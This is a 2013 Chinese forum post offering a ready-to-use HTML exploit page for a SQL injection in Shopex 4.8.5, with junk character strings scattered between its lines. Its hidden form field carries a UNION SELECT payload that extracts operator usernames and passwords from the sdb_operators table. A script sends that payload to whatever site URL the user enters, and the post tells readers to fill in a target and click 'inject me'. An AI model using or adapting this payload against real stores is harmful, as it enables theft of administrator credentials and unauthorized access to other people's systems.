<center># m s& F/ i' O) v& F* f
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>4 T' F# [7 g k" p
<form action="" method="post" name="submit_url">7 z1 m6 s; `8 P3 U: h
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>
5 i+ L7 G# L, ^. ^0 G3 z<input type="hidden" name="goods[goods_id]" value="3">
7 X9 _+ x3 d# r2 ~<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">
; }- p4 ?+ E; [: [<input type="submit" value="给我注入" onclick=fsubmit()>; X* J: C. z D8 k% M: G3 K
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com
: f4 `' b2 E0 V0 D+ F P% H1 c( P
5 M% x1 B! @7 |( u/ c<script> 1 p$ H! ~: z" }( n
function fsubmit(){
8 B# s( d, ^& \1 o+ Wform = document.forms[0]; $ `# ~. w* t3 s4 [) x+ i4 ~
form.action = form.url.value+'/?product-gnotify';
R4 k$ q! z7 fform.submit(); / a% E# a |, D
} 4 s0 T4 j0 q7 g. [
</script>
2 k. F+ L# u; d2 X) K! h( M$ s |
发表于 2013-1-23 09:20:52
收藏
支持
反对